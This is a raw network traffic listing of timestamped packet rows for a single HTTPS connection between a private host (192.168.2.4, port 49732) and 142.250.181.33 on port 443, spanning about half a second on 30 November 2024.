Nov 30, 2024 21:20:07.639252901 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.640512943 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.640557051 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.640563011 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.641669035 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.641707897 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.641714096 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.642853022 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.642896891 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.642901897 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.645047903 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.645091057 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.645097017 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.647474051 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.647516966 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.647521973 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.648015022 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.648055077 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.648061991 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.649219036 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.649266005 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.649271965 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.651057005 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.651103020 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.651109934 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.652198076 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.652244091 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.652250051 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.653394938 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.653436899 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.653443098 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.688595057 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.688651085 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.688653946 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.688668013 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.688707113 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.689131975 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.699724913 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.699769974 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.699776888 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.700683117 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.700727940 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.700733900 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.701977968 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.702023983 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.702028990 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.703090906 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.703134060 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.703139067 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.747139931 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.747211933 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.747217894 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.747802019 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.747847080 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.747853041 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.748976946 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.749025106 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.749030113 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.750138998 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.750185013 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.750190020 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.751709938 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.751755953 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.751760960 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.752861977 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.752906084 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.752911091 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.754018068 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.754080057 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.754085064 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.756253004 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.756299019 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.756305933 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.757409096 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.757453918 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.757458925 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.758570910 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.758618116 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.758624077 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.759516001 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.759561062 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.759567022 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.760659933 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.760703087 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.760709047 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.762864113 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.762903929 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.762909889 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.767810106 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.767857075 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.767863035 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.769299984 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.769344091 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.769349098 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.770401001 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.770446062 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.770452023 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.771456003 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.771501064 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.771506071 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.772488117 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.772532940 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.772537947 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.773546934 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.773593903 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.773600101 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.774386883 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.774430037 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.774435997 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.776237965 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.776282072 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.776287079 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.777257919 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.777299881 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.777304888 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.781189919 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.781234980 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.781241894 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.782558918 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.782604933 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.782610893 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.783541918 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.783585072 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.783591032 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.827522039 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.827575922 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.827581882 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.828624010 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.828758955 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.828764915 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.829641104 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.829685926 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.829690933 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.830579996 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.830621958 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.830626965 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.831567049 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.831615925 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.831620932 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.832577944 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.832622051 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.832627058 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.833693981 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.833739996 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.833749056 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.834806919 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.834851980 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.834857941 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.839346886 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.839400053 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.839405060 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.840014935 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.840058088 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.840064049 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.840997934 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.841042995 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.841048002 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.842144966 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.842194080 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.842200041 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.843163013 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.843214989 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.843220949 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.844149113 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.844187021 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.844192982 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.880723953 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.880769014 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.880875111 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.880887032 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.880933046 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.881094933 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.882107973 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.882153988 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.882159948 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.892853975 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.892905951 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.892911911 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.893291950 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.893332005 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.893340111 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.894325972 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.894371033 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.894381046 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.939492941 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.939538002 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.939543962 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.939842939 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.939882040 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.939888954 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.940893888 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.940937042 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.940943003 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.942017078 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.942058086 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.942063093 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.942995071 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.943043947 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.943051100 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.943974972 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.944020987 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.944027901 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.945929050 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.945995092 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.946002007 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.946860075 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.946888924 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.946907043 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.946914911 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.946957111 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.947845936 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.948894024 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.948941946 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.948951960 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.949821949 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.949888945 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.949894905 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.951023102 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.951069117 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.951075077 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.951937914 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.951982021 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.951988935 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.952980995 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.953028917 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.953036070 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.953912020 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.953953028 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.953958988 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.959992886 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.960031033 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.960037947 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.960454941 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.960494041 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.960500956 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.961385012 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.961430073 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.961436987 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.963298082 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.963335037 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.963341951 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.964339972 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.964382887 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.964390039 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.965231895 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.965275049 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.965282917 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.966048002 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.966089964 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.966097116 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.967107058 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.967145920 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.967153072 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.968102932 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.968144894 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.968152046 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.973505974 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.973555088 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.973562002 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.974114895 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.974159002 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.974164963 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.975387096 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:07.975430012 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:07.975435972 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.019175053 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.019301891 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.019309998 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.019623995 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.019674063 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.019680977 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.021481037 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.021523952 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.021532059 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.022474051 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.022517920 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.022525072 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.023538113 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.023582935 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.023590088 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.025029898 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.025073051 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.025079012 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.025810003 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.025857925 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.025861979 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.026580095 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.026623011 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.026628017 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.027594090 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.027635098 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.027640104 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.031553030 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.031605959 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.031610012 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.032594919 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.032634974 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.032639027 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.033735991 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.033777952 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.033782005 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.035283089 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.035330057 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.035334110 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.036261082 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.036303997 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.036309004 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.037264109 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.037308931 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.037313938 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.073008060 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.073065996 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.073074102 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.074002981 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.074049950 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.074055910 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.075014114 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.075057983 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.075062990 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.085253000 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.085315943 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.085319996 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.086260080 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.086302996 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.086307049 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.087328911 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.087373018 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.087377071 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.131819010 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.131872892 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.131879091 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.132617950 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.132663965 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.132668972 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.133589983 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.133637905 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.133641958 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.134563923 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.134610891 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.134617090 CET	443	49732	142.250.181.33	192.168.2.4
